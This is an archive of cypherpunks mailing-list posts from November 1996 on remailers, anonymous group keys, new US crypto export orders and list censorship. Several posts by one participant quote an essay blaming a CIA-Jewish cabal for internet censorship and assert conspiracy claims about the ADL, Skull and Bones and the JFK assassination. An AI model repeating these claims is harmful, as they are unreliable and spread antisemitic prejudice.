Message-ID: <328D0476.4C3B@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> 
> I read awhile ago that certain members of Parliament do not speak
> their mind regarding the situation in Northern Ireland.  The reason
> they give is that they have children and they fear the IRA.
> 
> There are times when one wishes to speak anonymously, yet speak
> as a member of a group.
> 
> Is there a way to take published public keys and combine them with
> your own in such a way that your identity is not compromised, but
> it is clear beyond a doubt that you control one of a set of public
> keys?

One way to implement this would be to set up a remailer that only 
accepts input signed by a key on its ring.

Or just share a secret key. It would have to be timestamped, i.e., 
"104th Congress Key."

You either need to trust a shared server to know and then blind your 
identity, or trust the people with whom you share a secret key not to 
give that key to non-group members.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 15 Nov 1996 16:07:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: THAT is what makes John Gilmore an ASSHOLE! [NOISE] [HOT TUBBING]
In-Reply-To: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
Message-ID: <328D0583.653@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:
> 
> aga wrote:
> >
> > No it ain't; not after the list gets so big.  Public newsgroups
> > lose all rights of censorship by the owners, and that is law.
> 
> Guffaw, guffaw.
> 
> (So what if John decided simply to pull the plug on toad in order to
> plug in a new hot tub?)

Cool. I've always wanted a hot tub.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 15 Nov 1996 13:53:33 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: HP announcement re encryption (fwd)
Message-ID: <Pine.SUN.3.95.961115165515.27778A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 15 Nov 1996 16:27:22 -0500 (EST)
>From: Ross Stapleton-Gray [email was here]
Subject: HP announcement re encryption

>From Reuters... for those in the DC area, it'll be at the National Press
Club at 8am Monday...


PALO ALTO, Calif. (Reuter) - Hewlett-Packard Co. said Friday that it will
unveil a breakthrough agreement on Monday in the long-deadlocked debate
over software encryption, a development that could eliminate a key
impediment to the growth of electronic commerce via the Internet.

A spokesman said H-P Chairman and Chief Executive Lewis Platt will provide
details of a deal involving computer industry leaders, the Clinton
administation and other governments at a press conference in Washington. 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 15 Nov 1996 13:57:36 -0800 (PST)
To: "Peter Hendrickson" <ph@netcom.com>
Subject: RE: Remailer Pricing
Message-ID: <n1364045177.55582@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson's electrons stated
>It looks like I wasn't perfectly clear again.  Sorry about that.  The user
>does not tell anybody whether or not the mail has been read.  In fact,
>it's nobody's business but their own.  This is the advertiser's problem,
>and I don't really care whether they solve it.  In fact, the user does
>not have to put the remailer on the accept list.  He or she just has
>to tell the remailer operator that they would like to receive a dollar
>(or whatever) if the remailer operator sends them any mail.

Small point, but noted.  I thought the word "read" was mentioned, but 
obviously it was "received"...

Perhaps we've been thinking about anonymous mail the wrong way.  Is it
like the U.S. Post Office where you have to physically go someplace,
buy a stamp, physically write your message, put it in a physical envelope,
carry it to a box someplace, and then wait (maybe four days) for it to
arrive, all for "only" 32 cents?  Or is it more like Federal Express
where you pay 20 bucks and it arrives the next day, for sure, every time?

Earlier today somebody sent a message about his scary former employers
and (apparently) how they just kill people.  Would that person pay, say,
$5 to have the message delivered reliably and very anonymously?  My
judgement is that it would be worth every penny, and probably more.

>Right now the remailer network is a mess.  There just aren't that many
>remailers operating in a timely and reliable manner.  I am not knocking
>the remailer operators for this, it's just clear that "free" doesn't
>make it worth their while to keep the remailers operating perfectly
>at all times.

Very true.  This strengthens my point that the remailer operator would
want a piece of the pie, as well...

>A good pricing strategy for remailers would be to charge, say, $1 for
>instant delivery, $.50 for 30 minute delivery, etc.  To generate
>interest, 4 hour delays could be imposed for free remailing, if the
>resources are available.

fTotalCostOfDelivery = fCostOfReceipt + nRemailersUsed * fRemailerCost

Obviously, nRemailersUsed is only necessary for anonymous chaining...

Don't get me wrong, there's nothing meant by this equation, no point 
trying to be made, nothing.  I'm just showing you the pricing strategy.

I strongly agree with you that paying for remailer use would greatly 
improve service, and would probably be a good thing.  In the case of
chaining, there would have to be a great deal of trust involved so none
of the remailers stole all the postage w/out forwarding the message.  
(Just a thought, anyway)

Here's an idea I was tossing around sometime earlier--
One capitalist idea that would invalidate this theory.  A remailer would
make a lot of money if they made a deal with an advertiser, esp. an 
advertising agency (containing ads for many companies, if I chose the 
wrong words) if they eliminated incoming postage, and possibly paid outgoing 
postage or had the ad agency pay the postage (within limits, of course).
The remailer would then tag on advertisements to each mailing.  Direct
marketing (Note: This is what we're trying to avoid, but I see it happening)
The non-charging remailer would become wildly popular, as they don't 
charge postage, and they would be fast, because they would have corporate
sponsorship.  This idea is *far* from being farfetched; it exists now.
Every mail I receive at my free geocities account has an ad attached.

Patrick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 15 Nov 1996 14:08:15 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Clipper 3.11 executive order
Message-ID: <Pine.SUN.3.95.961115171049.27778D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://library.whitehouse.gov/PressReleases.cgi?date=0&briefing=4 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Fri, 15 Nov 1996 17:23:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: National Emergency
Message-ID: <199611160123.RAA00315@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin posted to the cyberia list a pointer to the Clinton
administration's new export policy.  He has a copy on his web site at:
<URL: http://www.law.miami.edu/~froomkin/nov96-regs.htm >.  The thing
I found interesting is that it refers to the fact that we are currently
living under a state of national emergency!  I searched on the whitehouse
web site and couldn't find the executive order referred to (maybe it was
classified) but did find this one:

	For Immediate Release                             June 30, 1994 


			  Executive Order 
			      #12923 
			   - - - - - - - 

	     Continuation Of Export Control Regulations 


	  By the authority vested in me as President by the  
	Constitution and the laws of the United States of America,  
	including but not limited to section 203 of the International  
	Emergency Economic Powers Act ("Act") (50 U.S.C. 1702), I, William  
	J. Clinton, President of the United States of America, findthat  
	the unrestricted access of foreign parties to U.S. goods,  
	technology, and technical data and the existence of certain  
	boycott practices of foreign nations, in light of the expiration  
	of the Export Administration Act of 1979, as amended (50 U.S.C.  
	App. 2401 et seq.), constitute an unusual and extraordinarythreat  
	to the national security, foreign policy, and economy of the  
	United States and hereby declare a national emergency with respect  
	to that threat. 

Apparently this state of emergency is still in effect.  This is what
gives the President the power to unilaterally make changes in the export
policy.  It would be nice if our congresspeople would take some
responsibility in this matter.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 15 Nov 1996 14:24:43 -0800 (PST)
To: cypherpunks <CYBERIA-L@LISTSERV.AOL.COM>
Subject: Mirror of new export control regulations
Message-ID: <Pine.SUN.3.95.961115172400.27778G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Because it appears that the whitehouse URL changes daily for press
releases, I've put a link to a copy of the text of the rules at the top of
my homepage.  You can also skip straight to it at:

http://www.law.miami.edu/~froomkin/nov96-regs.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 21:00:02 -0800 (PST)
To: "Edward R. Figueroa" <kb4vwa@juno.com>
Subject: Re: The Conspiracy To Erect An Electronic Iron Curtain
In-Reply-To: <19961114.205947.7711.21.kb4vwa@juno.com>
Message-ID: <328D1F5C.1ABF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Edward R. Figueroa wrote:
> An Essay by L. R. Beam
> The internet, perhaps the last truly free means of information exchange
> in the Western World, may soon be choked by censorship and governmental
> controls. The circumscribing of the net may cause the death of what has
> become the first people-to-people exchange of ideas and information on a
> world wide basis. The forces behind this effort appear at first glance to
> be an unlikely coalition of conspirators, the CIA, some Jewish Religious
> groups, and various foreign governments. While this unholy alliance for
> censorship and control may seem unusual to some, politics makes the bed
> for these strange fellows. Indisputably, an international cabal of
> special interest groups both within and out of governments are working
> both openly and secretly to end the unregulated direct exchange of
> information between people. At stake is nothing less then the regaining
> of information control which the internet has shattered. Up for grabs is
> nothing more than the thinking and decision making abilities of informed men.

[snip, snip]

> In closing the author would like to make two additional things clear.
> First, there are Jews who oppose censorship although to this point their
> voice is but a whisper compared to the intolerance of the Anti-Defamation
> League and Rabbi Cooper. Second, that writing about Jewish religious
> leaders and government spymasters operating in a collusive effort to
> erect an electron iron curtain to restrict freedom of speech and
> information does not make one anti-Semitic or anti-government. The truth
> is anti-Semitic. The government is erecting a police state. The author
> opposes both oppressive religious groups and repressive government. If
> speaking the truth and opposing tyranny makes one anti-Semitic and
> anti-government, then I am both...

I wish there were a way to inform people that the ADL is not a "Jewish"
group just because they so claim.  Informed persons have pointed to the
not-so-coincidental founding of this organization at approximately the
same time as the Federal Reserve and the Income Tax, and just a few years
after the founding of the FBI by Napoleon's grandson.

Word is that while the World Jewish Congress declared war on Hitler in
1933, the ADL actually *suppressed* Jewish dissent in the U.S., at least
until 1937-38, because it was "good for business". I wouldn't call these
ADL people "Jewish", I'd call them pals of Prescott Bush and Averell
Harriman, to name a couple of supreme scumbags.  The same people and
ideology who propped up Hitler are foaming at the mouth now over their
good fortunes in China and other parts of SE Asia.

As far as whether a person's ethnicity makes a difference in their govt.
positions, a la the DCI, it's my feeling that certain ties and loyalties
are exploited by the scum at the top for their own gain (and they don't
give a damn about religion, at least in any normal sense), and to see a
possible analogy for this, look at Stone's JFK movie, where the CIA et al
were using gay men that they could blackmail at the time, for jobs where
they didn't want people to talk.

BTW, 1913 (nice number, huh?) was the year for the 3 things listed above.
Those things were enacted in the Taft administration, Taft being the
grandson of the founder of Skull and Bones, the control group for the
Bush and Harriman clan.  Wot a coincidence, eh?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Fri, 15 Nov 1996 15:01:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Cryptography Regulations
Message-ID: <9611152305.AA00627@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



The changes themselves are pretty technical

http://docs.whitehouse.gov/white-house-publications/
 1996/11/1996-11-15-exec-order-on-crypto-export-controls-administration.text



http://docs.whitehouse.gov/white-house-publications/
 1996/11/1996-11-15-president-letter-on-change-in-crypto-export-control.text


The main change is that from now on the decisions are to be made 
by the department of commerce and not by the department of state.

This is probably good news since the commerce department has the
interests of industry as its primary mission.

There is a third document I believe but its not yet been issued.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 18:07:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <l03010605aeab7149a687@[152.3.87.2]>
Message-ID: <v03007806aeb2d2482a72@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 PM -0500 11/15/96, Adam Gulkis wrote:
>a locked startup disk is not a good idea, if it is even possible.
>Most applications setup scratch space on the startup volume.  It would
>be a better idea to setup a partition for applications and lock it, if
>you feel that is necessary.  Norton DiskLock is a nice tool that
>provides a startup password protection as well as screensaver
>password.  It will request a password if the machine sleeps or to
>reboot after a crash.

Since others have mentioned Macs in this thread, and since I have a Mac, I
should point out that booting from a locked startup disk is possible, even
common. Namely, a CD-ROM.

What an OS would _like_ to write is not the same thing as what it _must_ write.

Also, for Unix systems there are similar approaches. Hugh Daniel has been
working on a "read-only" startup disk for Unix.

I don't know anything about DOS or Windows, except that every Intel chip
sale helps me financially.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 21:00:14 -0800 (PST)
To: Rich Graves <rcgraves@ix.netcom.com>
Subject: Re: The persistance of reputation
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <328D2595.89B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> Robert Hettinga wrote:
> > At 8:02 pm -0500 11/11/96, Rich Graves wrote:

[snippo]

> No. It requires both. And sometimes, technical skill. How many people
> here know enough to evaluate the data concerning, to take a notorious
> example, the Kennedy assassination? I accept the historical consensus,
> but I know there are a lot of otherwise rational people on cypherpunks
> who are convinced that there was some sort of coverup (which sort, they
> often don't know or care; but they're conviced there was one). Oliver
> Stone got some ridiculous movie made based on this non-thesis (actually
> two, counting Nixon). People growing up today are learning pseudohistory
> and pseudoscience from Oliver Stone, "The X Files," "Dark Skies," and
> "Millenium." I find that scary. The net is better than TV, because it
> allows more responses, but I'm not sure how much better.

You accept the historical consensus?  And which historical consensus is
that?  The non-consensus investigated by the prime suspect (Johnson)?
Or the consensus investigated by the people's representatives, i.e. the
House of Representatives?

Maybe you didn't know that the #2 man should be considered the primary
suspect, huh?  And a coverup, by golly!  Imagine that the U.S. government
would do such a thing?  Couldn't be, could it?

They were just hiding the Zapruder film for 12 years in our best interest,
right?  No need to show the people Kennedy's upper torso (about 100 pounds
of weight) being blown violently *backward* as a result of a frontal shot,
since "Oswald" couldn't have been in front.  Nosiree!

Next thing you're gonna say is that "Oswald" shot Tippit with his *revolver*
and then stopped to unload the spent shells by the body, yes?

And Jack Ruby was just an irate citizen who felt sorry for Jackie, huh?

I prefer not to judge people by just one posting, but like Noam Chomsky,
with his "I can't see *anyone* who would have wanted Kennedy dead"
bullshit, I just can't buy the notion that whoever wrote the above crap
about the "historical consensus" doesn't really know what's going on.

A disinformer posing as an idiot.  Go figure.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 21:00:26 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611150619.AAA01605@smoke.suba.com>
Message-ID: <328D2BB7.71DC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> > [This is a rebuttal to a misguided news article.]
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)

[snip, snip]

> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)

> It still isn't censorship. Censorship, at least in my dictionary,
> refers to censor, which uses the word "Official" several times. Mr.
> Gilmore is not an "Official" in a government sense, he maybe in the EFF
> sense, but this is not an "Official" EFF organ, so that doesn't count.

We *are* talking about the cypherpunks list, yes?  Then, in terms of the
list, John Gilmore *is* the official, hence a censor, plying his skills.

Why all the denial and repeated (redundant) blathering about John's
*right* to something he allegedly owns?  Simple.  The folks who put this
stuff out want desperately to believe that this list they spend so much
time on is "really OK", and not a censored medium.  Denial is the key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Fri, 15 Nov 1996 11:23:30 -0800 (PST)
To: Jody C Patilla <cypherpunks@toad.com>
Subject: Sarcasm for Jody. [WAS: Top Ten Corporate Security Needs?]
In-Reply-To: <199611151336.IAA00800@clipper.hq.tis.com>
Message-ID: <199611151923.MAA11169@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611151336.IAA00800@clipper.hq.tis.com>, on 11/15/96 
   at 08:35 AM, Jody C Patilla <jcp@tis.com> said:

:> "The Top Ten Corporate Security Needs of MIS"
:> 

:Since Mark Riggins wants free assistance in doing his marketing research,
:I can certainly oblige, but I would have to say that my clients tell me
:there are only three things they want:

:1. Total security.
:2. Totally transparent access from everywhere.
:3. And all of it for free.

:and there you have it, sports fans!
:- jcp

        ...truer words were never spoken;  and, when there is a problem,
    the man will call up and say "It dont work!..."  to which you ask:
    "OK, _what_ does not work?..."   and this sequence is repeated again
    and again  -ad nauseum--  "..._IT_ dont work!  I keep telling you!"  

       The call escalates all the way to your head freak, who has never
    suffered fools well... (and should never be permitteed to
    talk to a real customer, much less a prospective customer)...

        The probably simple problem (Maybe  ...it was unplugged?) is 
    resolved by the guru asking the client: "...why in the fuck would 
    you do something as 'stupid and ignorant' as _that_?!?).   

        Of course, the resolution is a lost customer....   "Minor
    problem,.." says the guru: "he's a jerk, we dont need him...."

        And, redder than a russian beet, cradling the talking instrument
    with plastic shattering impact, our beloved peter-principle
    corporate honcho screams at his staff:  "...I told you stupid nerds
    you should have gone with Bill Gates --someone smart!"

            -attila
--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 18:57:25 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: National Emergency
In-Reply-To: <199611160123.RAA00315@crypt.hfinney.com>
Message-ID: <v03007800aeb2dc721dbf@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:23 PM -0800 11/15/96, Hal Finney wrote:
>Michael Froomkin posted to the cyberia list a pointer to the Clinton
>administration's new export policy.  He has a copy on his web site at:
><URL: http://www.law.miami.edu/~froomkin/nov96-regs.htm >.  The thing
>I found interesting is that it refers to the fact that we are currently
>living under a state of national emergency!  I searched on the whitehouse
>web site and couldn't find the executive order referred to (maybe it was
>classified) but did find this one:

Use the source, young Hal! While the White House Web site may not have it
online, Alta Vista turns up 113 hits (though not all valid) to it.

Basically, this was one of the alphabet soup of Emergency Orders, National
Security Decision Directives, and Executive Decisions passed or enacted
(sometimes in secrecy) during the last 30 years of the Continuing Emergency.

(Nixon's wage-price freezes, the oil embargo actions, the strategic
reserves, the anti-inflation measures, various Carter emergencies, and
various Reagan emergency orders, including NSDD-145, which directly affects
control of communicaitons, cryptography, etc.)

FEMA, the Federal Emergency Preparedness Agency, took over several of these
emergency orders (the running of them) in the late 70s.

Standard stuff for we conspiracy buffs. One doesn't need to invoke
historical groups like the Illuminati to see that the levers of power are
pulled by strange folks.

One of the things that most people don't appreciate is that these emergency
orders are essentially never repealed. (Not too surprising--if I was in
government, I wouldn't voluntarily give back any additional powers, either.
And the only consituency for rolling them back is the membership of the
evil militias, so nothing happens.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Fri, 15 Nov 1996 20:34:34 -0800 (PST)
To: ph@netcom.com
Subject: Re: Playing Cards
Message-ID: <199611160304.TAA00446@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ph@netcom.com (Peter Hendrickson)
> A well shuffled deck of 54 cards has about 237 bits of entropy.  This
> is easy to use: the program asks the order of the cards, converts this
> to a string, and runs it through a one-way hash.  (Entering the cards
> is a bit of a nuisance.  Is there an easy way to have them read
> automatically?)

I heard that Bruce Schneier has devised a cryptosystem based on a card
deck for a future book by Neal Stephenson.  It is supposed to be simple
enough for a person to use manually, but complicated enough that it can't
be broken by computer.  Your idea of using cards as a one time pad is
somewhat similar, maybe, although I think Bruce's was designed to be
useful for long messages, providing computational rather than unconditional
security.

> How the Lisp Code Works
> -----------------------
>
> Let's use as an example a deck of five cards numbered from 0 to 4.
> There are 5! = 120 combinations of these cards.  We can think
> of each card as a "digit" in a slightly odd numbering system.

This is very interesting; I've never seen this algorithm before.  It
is a nice way to turn a number into a permutation, and vice versa.

> For an exercise, what is the value of (4 2 1 3 0)? (Answer at end.)

This would be 4*4! + 2*3! + 1*2! + 1(was 3)*1! + 0*0!, or as you say:

> ;; (Exercise Answer: (4 2 1 3 0) = 111)

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 15 Nov 1996 19:35:24 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611160335.TAA10530@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 AM 11/15/96 -0500, hallam@vesuvius.ai.mit.edu wrote:
>
>Jim appears to be arguing that the "common law" courts heis refering
>to had judges appointed by the King. If so the right to appoint
>judges to those posts passed to the US government under the treaty
>of Paris. 

WRONG!   One of the main principles of the US Constitution is that the 
government has no "rights," per se:  It merely has specific authority 
granted to it by the people and the states of America.  A treaty with a 
defeated monarch did not and could not grant authority to the Federal 
governemnt that it did not already have.

Also, you've screwed up on the timeline:  The Treaty of Paris was signed in 
1783, and the US Constitution was finalized in 1787, four years later.  
Quite simply, the Federal government of the US didn't exist when the Treaty 
was made. No "rights" could be transferred to a non-existent branch of 
government.

I suppose you'll now claim that the "rights" were transferred to the states, 
right?  Well, the states did not have their own Constitutions, either.    
And unless those Constitutions mentioned commonlaw courts, it's pretty 
obvious that the public did not anticipate including those powers in those 
state governments.  It is obvious that King George relinquished that power; 
what you'll be unable to show is that this power flowed to any entity other 
than the people of America, every one of them.


>The Common Law in the UK was the kings law since the Norman conquest.
>It is as any schoolboy knows judge made law. The doctrine of precedent
>has become more and more prominent since the renaisance though, effectively
>preventing judicial lawmaking except in areas where no law is believed
>to exist.
>
>As a system of government I don't think very much of the idea of a 
>bunch of klansmen getting together to decide who they dislike. Sounds
>much more like a lynch mob than a system of government to me. 

For every "bunch of klansmen" getting together, you'll have a few hundred 
bunches of far more reasonable people.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Fri, 15 Nov 1996 16:34:43 -0800 (PST)
To: cypherpunks mailing list <cypherpunks@toad.com>
Subject: Key Escrow
Message-ID: <3.0b36.32.19961115193400.0093c210@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


For my Professional Ethics class I was charged to do an essay on something
topical and analyze it using the three main systems of ethics
(Utilitarianism, Kantian Rights, and Justice as fairness.)  I have pretty
much wrapped up the essay and was hoping I could get some feedback from you
guys (and gals, to be PC) about it.  It is supposed to stay under 5 pages,
and is intended for Joe non-crypto-user, so I wasn't allowed to ramble on
about crypto, but I would still like some feedback.

Anyone who is interested can obtain the document at:
http://www.spacey.net/oringer/rickoz/Ethics.htm
and the original Word 7.0 version at:
http://www.spacey.net/oringer/rickoz/Ethics.doc

Thanks,
Rick


Rick Osborne / C++ VB Pascal HTML VRML Java / osborne@gateway.grumman.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Women like a guy who looks trim, neat.  You got to be sharp.  I look
like I'm wearing a circus tent.  Any minute now a little tiny car, with
sixteen clowns in it is gonna come flying out my butt."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 20:15:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mirror of new export control regulations
In-Reply-To: <Pine.SUN.3.95.961115172400.27778G-100000@viper.law.miami.edu>
Message-ID: <v03007801aeb2f057ca8e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 PM -0500 11/15/96, Alan Davidson wrote:
>>http://www.law.miami.edu/~froomkin/nov96-regs.htm
>
>
>It gets even more interesting.  In addition to signing today's Executive
>Order on encryption, the President also designated Ambassador David L.
>Aaron as the new "Special Envoy for Cryptography."  (Really, I'm not making
>this up.)

Could this be the same David Aaron who writes thriller novels about nuclear
terrorism?


(I don't know that it is, by the way, nor am I making a joke. A David
Aaron, with also diplomatic ties, wrote at least one fine thriller some
years back. If he's the crypto czar, he can probably spin an appropriately
scary story to tell the recalcitrant Third Worlders he'll be dealing
with...countries like France, Britain, etc.)

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 20:24:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611150046.QAA20765@toad.com>
Message-ID: <v03007802aeb2f3046b97@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:46 PM -0800 11/14/96, Sean Roach wrote:
>>On Wed, 13 Nov 1996, Mark M. wrote:

>To which, at 08:42 AM 11/14/96 -0500, aga wrote:
>
>>Why?  Are you a criminal?
>>What are you hiding behind your PGP?
>
>Okay, I'll bite.  Where is it said that a person who wants h[is,er] privacy
>is a criminal?  Charlie McCarthy might have said that.

You mean in his book "Crypto by Dummies"?

Or were you perhaps thinking of Joe?

(Gene is unlikely; Clean Gene didn't have much to say about secrecy.)

And Lewis has not been seen on our list in many a month.

--Tim Not-a-McCarthy



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryondp@aol.com
Date: Fri, 15 Nov 1996 17:38:57 -0800 (PST)
To: aga@dhp.com
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <961115203806_1150025335@emout03.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


take me off this fucking list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 15 Nov 1996 17:54:47 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Executive order on crypto
Message-ID: <199611160154.UAA23706@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



Ok, stop squabbling.  Here is something important.

The President has issued a couple of Executive Orders today that
transfer crypto to Commerce (eventually) and that make things worse,
not better, as far as I can tell at a quick reading.

An important portion of the Executive Orders is a rehash of arguments
that the government has made unsuccessfully in the Bernstein case and
has also made in my case.

I found out about the order from a posting by Michael Froomkin on
Cyberia-L.  The URL of the Executive Order, for today at least, is:

  http://library.whitehouse.gov/PressReleases.cgi?date=0&briefing=4

Michael Froomkin has also put up a mirror at:

  http://www.law.miami.edu/~froomkin/nov96-regs.htm

